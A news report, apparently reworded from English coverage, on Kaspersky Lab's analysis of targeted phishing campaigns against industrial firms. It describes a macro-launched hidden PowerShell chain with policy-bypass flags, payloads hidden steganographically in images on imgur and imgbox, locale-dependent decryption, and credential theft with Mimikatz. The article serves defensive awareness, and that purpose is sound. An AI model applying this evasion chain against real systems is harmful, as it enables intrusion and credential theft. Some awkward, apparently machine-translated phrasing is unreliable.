Enlarge /. Binary code, illustration.
Attackers use considerable skill and effort to penetrate industrial companies in multiple countries. This includes hacks that use multiple evasive mechanisms, an innovative encryption scheme, and exploits that are customized for each target.
The attacks begin with emails that are customized for each target, a researcher at security firm Kaspersky Lab reported this week. For the exploit to be triggered, the language in the email must match the location of the target's operating system. For example, an attack on a Japanese company required the text of the email and an attached Microsoft Office document to be written in Japanese using a malicious macro. Also required: An encrypted malware module could only be decrypted if the operating system also had a Japanese localization.
Recipients who click on a request to activate the active content of the document urgently see no indication that something is wrong. However, behind the scenes, a macro executes a powershell script. The reason why it stays hidden: the command parameters:
- ExecutionPolicy ByPass: For overriding organizational policies
- WindowStyle hidden. This will hide the PowerShell window
- NoProfile that runs the script without end-user configuration.
Someone who has triple coded steganography?
The PowerShell script reaches either imgur.com or imgbox.com and downloads an image in which malicious code is hidden in the pixels by a technique called steganography. The data is encoded by the Base64 algorithm, encrypted with an RSA key and then Base64 encoded again. In a clever move, the script contains an intentional error in the code. The resulting error message that is returned and that is different for each language pack installed on the operating system is the decryption key.
The decrypted and decrypted data is used as a second PowerShell script, which in turn unpacks and decrypts another blob of Base64-encoded data. A third, veiled PowerShell script runs Mimikatz malware to steal Windows account credentials that are used to access various network resources. In the event that stolen credentials include those for the powerful Windows Active Directory, attackers have access to virtually every node in the network.
The following diagram summarizes the course of the attack:
The attacks that Kaspersky Lab discovered in Japan, Italy, Germany and the UK are characterized by unconventional approaches, as mentioned in Kaspersky Lab's article this week. The corporate researcher Vyacheslav Kopeytsev wrote:
First, the malicious module is encoded into an image using steganographic techniques and the image is hosted on legitimate web resources. This makes it virtually impossible to detect such malware using network traffic monitoring and control tools while it is being downloaded. From a technical solutions perspective, this activity is indistinguishable from sending ordinary requests to legitimate image hosting services.
A second strange feature of malware is the use of the exception message as a decryption key for the malicious payload. This technique can help the malware elude detection in sandbox-class automated analysis systems, and makes it significantly more difficult for researchers to analyze the functionality of the malware if they don't know which language pack was used on the victim's computer.
Using the above techniques in combination with the accuracy of the infections shows that they were targeted attacks. It is worrying that contractors from industrial companies are among the victims of the attacks. If the attackers are able to collect the credentials of a contractor organization's employees, this can have a number of negative consequences, from theft of sensitive data to attacks on industrial companies through remote management tools used by the contractor.
Kaspersky Lab software ended the attacks before they could continue. As a result, researchers still don't know what the attackers' ultimate goal was. In recent years, control systems for gas refineries, power plants, factories, and other critical infrastructures have been increasingly attacked by saboteurs and ransomware. The customers of the contractors' industrial companies may have been the ultimate target of these attacks.